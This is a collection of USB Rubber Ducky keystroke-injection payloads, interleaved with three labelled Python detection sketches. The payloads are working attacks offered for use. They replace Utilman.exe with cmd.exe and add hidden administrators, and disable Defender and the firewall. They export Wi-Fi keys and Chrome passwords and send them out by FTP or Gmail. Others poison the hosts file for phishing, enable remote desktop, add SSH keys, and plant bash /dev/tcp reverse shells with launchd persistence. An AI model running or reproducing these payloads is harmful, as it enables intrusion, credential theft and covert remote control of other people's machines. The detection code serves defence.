STRING ren Utilman.exe Utilman.exe.bak
ENTER
STRING cd util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy util/Utilman.exe \
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING delete Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
GUI
STRING cmd
MENU
STRING a
ENTER
DELAY 50
LEFT
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER

Disable Windows Defender (Windows)

REM turn off windows defender then clear action center
REM You take responsibility for any laws you break with this, I simply point out the security flaw
REM
REM start of script
REM
REM let the HID enumerate
DELAY 2000
ESCAPE
DELAY 100
CONTROL ESCAPE
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 2000
REM why TAB and HOME?
TAB
DELAY 50
REM why TAB and HOME?
HOME
DELAY 50
ALT F4
DELAY 3200
REM windows + a = ????
GUI a
DELAY 500
ENTER
DELAY 100
GUI a

Wifi backdoor (Windows)

Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall.

CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER

Wifun (Windows)

This script will enter the command shell as administrator, disable the firewall, export the Wi-Fi settings, and then send them to an FTP server of your choice. The cool part is that the security key is exported in clear text. After sending the file it will delete the exports from the sending directory and restore the firewall.

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING netsh firewall set opmode mode=disable
ENTER
DELAY 400
STRING netsh wlan export profile key=clear
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ftp -i ftp server
ENTER
DELAY 400
STRING username
ENTER
DELAY 400
STRING password
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING MPUT *.xml
ENTER
DELAY 4000
STRING bye
ENTER
DELAY 400
STRING del *.xml
ENTER
DELAY 200
STRING netsh firewall set opmode mode=enable
ENTER
DELAY 400
ALT SPACE
STRING c
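
The netsh commands typed by the Wifi backdoor and Wifun payloads above each start a netsh.exe process, so they show up in process-creation logging. The following is an added example, not part of the original payload collection: it classifies netsh command lines from constructed log records and groups hits that come from the same parent shell within a short window, which is what a typed script looks like. The record field names (ts, ppid, cmdline), rule names and the 60-second window are assumptions.

```python
import json
import re
from datetime import datetime

# Constructed process-creation records, one JSON object per line.
# Field names are assumptions, not a specific product's schema.
EVENTS = r'''
{"ts": "2024-01-01T10:00:00", "ppid": 4120, "cmdline": "netsh firewall set opmode mode=disable"}
{"ts": "2024-01-01T10:00:01", "ppid": 4120, "cmdline": "netsh  wlan export profile key=clear"}
{"ts": "2024-01-01T10:00:09", "ppid": 4120, "cmdline": "netsh firewall set opmode mode=enable"}
{"ts": "2024-01-01T10:30:00", "ppid": 900, "cmdline": "netsh wlan show interfaces"}
{"ts": "2024-01-01T11:00:00", "ppid": 5000, "cmdline": "\"C:\\Windows\\System32\\NETSH.EXE\" wlan set hostednetwork mode=allow ssid=example key=placeholder"}
{"ts": "2024-01-01T11:00:01", "ppid": 5000, "cmdline": "netsh firewall set opmode disable"}
{"ts": "2024-01-01T12:00:00", "ppid": 77, "cmdline": "netsh advfirewall firewall add rule name=\"Backup agent\" dir=in action=allow program=\"C:\\Program Files\\Agent\\agent.exe\" enable=yes"}
{"ts": "2024-01-01T13:00:00", "ppid": 6000, "cmdline": "netsh advfirewall firewall add rule name=\"x\" dir=in action=allow program=\"C:\\Users\\u1\\AppData\\Local\\Temp\\tool.exe\" enable=yes"}
'''

USER_WRITABLE = ('\\temp\\', '\\appdata\\', '\\users\\')


def netsh_args(cmdline):
    """Return (context words, key=value params) for a netsh command line, else None."""
    toks = [t.replace('"', '') for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]
    if not toks or re.split(r'[\\/]', toks[0])[-1].lower() not in ('netsh', 'netsh.exe'):
        return None
    words, params = [], {}
    for tok in toks[1:]:
        key, eq, value = tok.partition('=')
        if eq:
            params[key.lower()] = value.lower()
        else:
            words.append(tok.lower())
    return words, params


def classify(words, params):
    """Map a parsed netsh invocation to a rule name, or None if it is not of interest."""
    if words[:3] == ['firewall', 'set', 'opmode']:
        # The payloads use both "opmode disable" and "opmode mode=disable".
        mode = params.get('mode') or (words[3] if len(words) > 3 else '')
        if mode in ('disable', 'enable'):
            return 'firewall-' + mode + 'd'
    if words[:4] == ['advfirewall', 'firewall', 'add', 'rule']:
        inbound_allow = params.get('dir') == 'in' and params.get('action') == 'allow'
        if inbound_allow and any(p in params.get('program', '') for p in USER_WRITABLE):
            return 'inbound-allow-user-path'
    if words[:3] == ['wlan', 'export', 'profile'] and params.get('key') == 'clear':
        return 'wlan-keys-exported'
    if words[:3] == ['wlan', 'set', 'hostednetwork'] and params.get('mode') == 'allow':
        return 'hostednetwork-enabled'
    if words[:3] == ['wlan', 'start', 'hostednetwork']:
        return 'hostednetwork-started'
    return None


def detect(log_text):
    """Return one observation per matching record; command lines are not echoed,
    so Wi-Fi keys passed as parameters do not end up in alert output."""
    observations = []
    for line in log_text.strip().splitlines():
        ev = json.loads(line)
        parsed = netsh_args(ev['cmdline'])
        rule = classify(*parsed) if parsed else None
        if rule:
            observations.append({'ts': datetime.fromisoformat(ev['ts']),
                                 'ppid': ev['ppid'], 'rule': rule})
    return observations


def sessions(observations, window_s=60):
    """Group observations from one parent shell spaced at most window_s apart;
    two or more in a group suggests a script rather than a one-off admin command."""
    runs = {}
    for o in sorted(observations, key=lambda o: o['ts']):
        chain = runs.setdefault(o['ppid'], [[]])
        if chain[-1] and (o['ts'] - chain[-1][-1]['ts']).total_seconds() > window_s:
            chain.append([])
        chain[-1].append(o)
    return [(ppid, [o['rule'] for o in run])
            for ppid, chain in runs.items() for run in chain if len(run) >= 2]


if __name__ == '__main__':
    for ppid, rules in sessions(detect(EVENTS)):
        print(ppid, rules)
```

A disable, export, enable sequence from one shell within seconds is the pattern the Wifun script produces, and it is worth alerting on even though the firewall ends up enabled again.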

Create wireless (auto-connect) network association (Windows)

DEFAULT_DELAY 200
ESC
ESC
REM opens task manager for a distraction
REM tell user you are checking memory or something
GUI r
STRING taskmgr
ENTER
ALT SPACE
STRING X
TAB
TAB
TAB
TAB
LEFT
LEFT
REM opens network manager
CTRL ESC
STRING Manage Wireless Networks
ENTER
TAB
TAB
TAB
TAB
ENTER
ENTER
REM creates ap association
STRING I_Love_Pineapples
TAB
DOWN
TAB
SPACE
TAB
SPACE
ENTER
ESC
ALT F4
CTRL ESC
REM reboots for autoconnect to pineapple
GUI r
STRING Shutdown.exe -r -t 00
ENTER

MissDirection

This payload edits the hosts file so that you can redirect web pages to wherever you would like the user to go.

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING cd C:\Windows\System32\drivers\etc\
ENTER
DELAY 400
STRING echo 64.149.122.94 www.test.com>>hosts
ENTER
DELAY 400
ALT SPACE
STRING c

Local DNS poisoning (Windows)

GUI r
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER

Local DNS poisoning (OSX)

REM A script to create a local DNS entry in the host file of a mac.
REM change the example.com to any site you want.
REM change the 127.0.0.1 to any ip you want.
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
ENTER
STRING nano /private/etc/hosts
ENTER
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
STRING 127.0.0.1 example.com
ENTER
STRING 127.0.0.1 www.example.com
ENTER
CTRL o
ENTER
CTRL x
STRING shutdown -h now

Phisher (Windows)

Used for phishing: it adds an IP of your choosing to the hosts file on Windows, so that when the user types, for example, www.facebook.com into the web browser, the request goes to the IP in the hosts file instead of the proper IP.

REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
ENTER
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER
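
The hosts-file payloads above (MissDirection, both Local DNS poisoning scripts and Phisher) all leave the same artifact: extra name-to-address lines in the hosts file. The following audit is an added example, not part of the original payload collection; the baseline of allowed names and the sample file are assumptions constructed from the entries shown above.

```python
import ipaddress
import re

# Assumed baseline: the only names a stock hosts file defines, with their allowed addresses.
BASELINE = {
    "localhost": {"127.0.0.1", "::1"},
    "broadcasthost": {"255.255.255.255"},  # present on macOS
}
# A "name" ending in a dotted quad means an append landed on an unterminated last line.
GLUED = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample: a hosts file after the entries typed by the payloads above were appended.
SAMPLE_HOSTS = """\
# localhost name resolution is handled within DNS itself.
127.0.0.1       localhost
::1             localhost

10.0.0.1 ADMIN.COM
64.149.122.94 www.test.com
127.0.0.1 example.com
127.0.0.1 www.example.com
"""


def parse_hosts(text):
    """Yield (line_no, ip_or_None, names) for each active (non-comment) entry."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if not fields:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            yield line_no, None, fields  # first field is not an address
            continue
        yield line_no, ip, [name.lower() for name in fields[1:]]


def classify(ip):
    """Describe where a non-baseline name is being sent."""
    if ip.is_loopback or ip.is_unspecified:
        return "sinkholed-locally"
    if ip.is_private:
        return "redirected-to-private-address"
    return "redirected-to-public-address"


def audit_hosts(text, baseline=BASELINE):
    """Return (line_no, reason, detail) for every entry outside the baseline."""
    findings = []
    for line_no, ip, names in parse_hosts(text):
        if ip is None:
            findings.append((line_no, "malformed-entry", " ".join(names)))
            continue
        for name in names:
            allowed = baseline.get(name)
            if allowed is not None and str(ip) in allowed:
                continue  # stock entry, unchanged
            if GLUED.search(name):
                reason = "entry-glued-to-previous-line"
            elif allowed is not None:
                reason = "baseline-name-remapped"
            else:
                reason = classify(ip)
            findings.append((line_no, reason, f"{name} -> {ip}"))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

On a real host, pass the contents of C:\Windows\System32\drivers\etc\hosts or /private/etc/hosts and extend BASELINE with any entries your build image ships.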

Remotely Possible (Windows)

Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file.

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING netsh firewall set opmode mode=disable
ENTER
DELAY 400
STRING ALT y
ENTER
DELAY 400
STRING net user /add username password
ENTER
DELAY 400
STRING net localgroup administrators username /add
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t
REG_DWORD /d 0x1 /f
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t
REG_DWORD /d 0x0 /f
ENTER
DELAY 400
STRING sc config TermService start= auto
ENTER
DELAY 400
STRING net start Termservice
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ipconfig /all > number.txt
ENTER
DELAY 400
STRING ftp -i ftp server
ENTER
DELAY 400
STRING login name
ENTER
DELAY 400
STRING login password
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING PUT number.txt
ENTER
DELAY 2000
STRING bye
ENTER
DELAY 400
STRING del number.txt
ENTER
DELAY 400
ALT SPACE
STRING c
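
The commands typed by Remotely Possible, Wifi backdoor and Wifun appear in process-creation logs as ordinary command lines, but several of them arriving within seconds on one host is a strong signal. The following detection sketch is an added example, not part of the original payload collection; the rule names, the event tuple format, the host names and the timestamps are assumptions, and the sample events are constructed from the commands shown above.

```python
import re
from collections import defaultdict

# One rule per command typed by the payloads above (rule ids are hypothetical).
RULES = [(rid, re.compile(rx, re.IGNORECASE)) for rid, rx in [
    ("firewall-disabled", r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode=)?disable\b"),
    ("local-user-created", r"\bnet1?(\.exe)?\s+user\b.*\s/add\b"),
    ("added-to-administrators", r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b.*\s/add\b"),
    ("rdp-enabled", r"\breg(\.exe)?\s+add\b.*\\Terminal Server\b.*\bfDenyTSConnections\b.*/d\s+(0x)?0\b"),
    ("termservice-autostart", r"\bsc(\.exe)?\s+config\s+TermService\s+start=\s*auto\b"),
    ("hosted-network-created", r"\bnetsh(\.exe)?\s+wlan\s+set\s+hostednetwork\b.*\bmode=allow\b"),
    ("wifi-keys-exported", r"\bnetsh(\.exe)?\s+wlan\s+export\s+profile\b.*\bkey=clear\b"),
]]

TS_KEY = r'"hklm\system\currentControlSet\Control\Terminal Server"'

# Constructed sample events: (epoch_seconds, host, command_line).
SAMPLE_EVENTS = [
    # WS-01: the Remotely Possible sequence, typed at keystroke-injection speed.
    (1000.0, "WS-01", "netsh firewall set opmode mode=disable"),
    (1000.9, "WS-01", "net user /add username password"),
    (1001.4, "WS-01", "net localgroup administrators username /add"),
    (1001.9, "WS-01", f'reg add {TS_KEY} /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f'),
    (1002.4, "WS-01", f'reg add {TS_KEY} /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f'),
    (1002.9, "WS-01", "sc config TermService start= auto"),
    # WS-02: read-only administration, nothing should match.
    (2000.0, "WS-02", "netsh firewall show state"),
    (2003.0, "WS-02", "net user"),
    # WS-03: two matching commands, but far apart in time.
    (3000.0, "WS-03", "net user /add svc_backup PLACEHOLDER"),
    (9000.0, "WS-03", "net localgroup administrators svc_backup /add"),
]


def match_rules(command_line):
    """Return the ids of all rules that match one command line."""
    return [rid for rid, rx in RULES if rx.search(command_line)]


def detect_bursts(events, window=30.0, min_rules=3):
    """Return {host: sorted rule ids} where at least min_rules distinct rules
    fired on the same host within `window` seconds of each other."""
    per_host = defaultdict(list)
    for ts, host, cmd in sorted(events):
        per_host[host].extend((ts, rid) for rid in match_rules(cmd))
    alerts = {}
    for host, hits in per_host.items():
        start, flagged = 0, set()
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:  # slide the window forward
                start += 1
            in_window = {rid for _, rid in hits[start:end + 1]}
            if len(in_window) >= min_rules:
                flagged |= in_window
        if flagged:
            alerts[host] = sorted(flagged)
    return alerts


if __name__ == "__main__":
    print(detect_bursts(SAMPLE_EVENTS))
```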

Root backdoor (OSX)

REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER

Catch the shell with netcat:

nc -l -p 1337

User backdoor (OSX)

REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
GUI q

Catch the shell with netcat:

nc -l -p 1337
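
Both OSX backdoor scripts persist through a launchd job, so the property list they write is the artifact to hunt for. The following audit is an added example, not part of the original payload collection; the reason tags are hypothetical names, and the sample plist is constructed from the one typed above with '$HOME' expanded for a hypothetical user "alice".

```python
import plistlib
from pathlib import Path, PurePosixPath
from xml.parsers.expat import ExpatError

SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}

# Constructed sample: the job definition from the payloads above.
PAGE_STYLE_PLIST = b"""<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>/Users/alice/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>
"""

# Constructed sample: an ordinary scheduled job that should produce no findings.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key>
<array><string>/usr/local/bin/backup</string><string>--daily</string></array>
<key>StartInterval</key><integer>86400</integer>
</dict>
</plist>
"""


def audit_launchd_plist(data):
    """Return a sorted list of reason tags for one launchd job (XML or binary plist bytes)."""
    try:
        job = plistlib.loads(data)
    except (ValueError, ExpatError):  # InvalidFileException is a ValueError
        return ["unparseable-plist"]
    if not isinstance(job, dict):
        return ["unparseable-plist"]
    reasons = set()
    argv = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    argv = [str(arg) for arg in argv]
    if argv and argv[0] in SHELLS:
        reasons.add("runs-shell-interpreter")
    for arg in argv:
        # Any dot-prefixed component of an absolute path hides the target from Finder and ls.
        if arg.startswith("/") and any(p.startswith(".") for p in PurePosixPath(arg).parts[1:]):
            reasons.add("target-in-hidden-directory")
    label = str(job.get("Label", "")).lower()
    if label.startswith("com.apple") and not label.startswith("com.apple."):
        reasons.add("apple-lookalike-label")
    if job.get("RunAtLoad") is True and "StartInterval" in job:
        reasons.add("runs-at-load-and-every-interval")
    if job.get("AbandonProcessGroup") is True:
        reasons.add("abandon-process-group")
    return sorted(reasons)


def scan(directories):
    """Audit every *.plist in the given directories; return {path: reasons} for flagged jobs."""
    flagged = {}
    for directory in directories:
        for path in sorted(Path(directory).expanduser().glob("*.plist")):
            try:
                reasons = audit_launchd_plist(path.read_bytes())
            except OSError:
                continue  # unreadable file, skip it
            if reasons:
                flagged[str(path)] = reasons
    return flagged


if __name__ == "__main__":
    # The two locations written by the payloads above.
    print(scan(["/Library/LaunchDaemons", "~/Library/LaunchAgents"]))
```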

Passwordless SSH access (OSX)

Replace RSA_PUB_ID with your SSH Public Key.

REM This script adds a ssh public key to the authorized_keys file on a target's mac.
DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
ENTER
DELAY 1000
STRING killall Terminal
ENTER
REM Note: you may shorten the times if you think they are too slow. I made them to accommodate older macs that can't get around very fast.

Information Gathering

Chrome password stealer (Windows)

Google Chrome Version 36.0.1985.143 and below: Any version above is patched and requires user password.

REM Target: Windows 7
REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copies password
REM closes chrome, Opens notepad with bypass uac so it can save to C:\ drive and pastes in password
REM saves to C:\passwords.txt folder, closes notepad
REM sends files via gmail to account.
DELAY 2000
REM -------------open chrome
GUI r
DELAY 1000
STRING chrome
DELAY 1000
ENTER
DELAY 4000
REM -------------copy plaintext password
STRING chrome://settings/passwords
ENTER
DELAY 2000
STRING facebook
DELAY 500
TAB
DELAY 500
DOWN
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
ALT D
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
CTRL C
DELAY 500
ALT F4
DELAY 500
REM -------------save file to music folder as passwords.txt
GUI R
DELAY 500
STRING powershell start-process notepad.exe -Verb runAs
DELAY 500
ENTER
DELAY 2000
ALT y
DELAY 1000
CTRL V
DELAY 500
ALT f
DELAY 500
STRING s
DELAY 500
STRING passwords.txt
DELAY 500
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
STRING c
DELAY 1000
STRING l
DELAY 500
ENTER
DELAY 500
ALT S
DELAY 1000
ALT F4
DELAY 500
REM -------------email log via gmail
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youremail@gmail.com', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'youremail@gmail.com'
ENTER
STRING $ReportEmail.To.Add('toemail@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Ducky chrome passwords'
ENTER
STRING $ReportEmail.Body = 'Attached is your list of passwords.'
ENTER
STRING $ReportEmail.Attachments.Add('c:\passwords.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 3000
STRING exit
ENTER

Wifi password grabber (Windows)

Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account. Change the following things;

DELAY 3000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000
REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER
REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER
REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER
REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER
REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER
REM --> Delete A.txt
STRING del A.txt
ENTER
REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

Suggestions

Information gathering (Ubuntu)

The following script is an information gatherer that collects info from a running Ubuntu OS and saves it to a file named “info_gathering.txt”. The info that the script retrieves is the logged-in username, the distribution and kernel version of the running system, the applicability of the Shellshock bug, the mounted filesystems, information related to the network adapters, the availability of development tools (python, g++), the contents of the hosts file and the listening TCP/UDP connections. Apart from that, it attempts to find readable folders inside the /etc folder and also prints the SUID and GUID files.

REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock, Improved by Thecakeisgit ;D
DELAY 3000
CTRL ALT t
DELAY 1500
STRING clear
DELAY 10
ENTER
DELAY 50
STRING echo "Logged in user: " $USER > info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo -n "Distribution Kernel Version: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING cat /etc/issue | cut -c1-13 >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo -n "uname results: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING uname -a >> info_gathering.txt
DELAY 50
ENTER
DELAY 100
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo "Shellsock Bug Vulnerability: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING env x='() { :;}; echo vulnerable' bash -c "echo this is a test" >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo "Mounted filesystems: " >> info_gathering.txt
ENTER
DELAY 50
STRING mount -l >> info_gathering.txt
DELAY 50
ENTER
DELAY 100
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Network Configuration: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING ifconfig -a | grep 'Link\|inet' >> info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Print Hosts: " >> info_gathering.txt
ENTER
DELAY 50
STRING cat /etc/hosts >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Print ARP: " >> info_gathering.txt
ENTER
DELAY 50
STRING arp >> info_gathering.txt
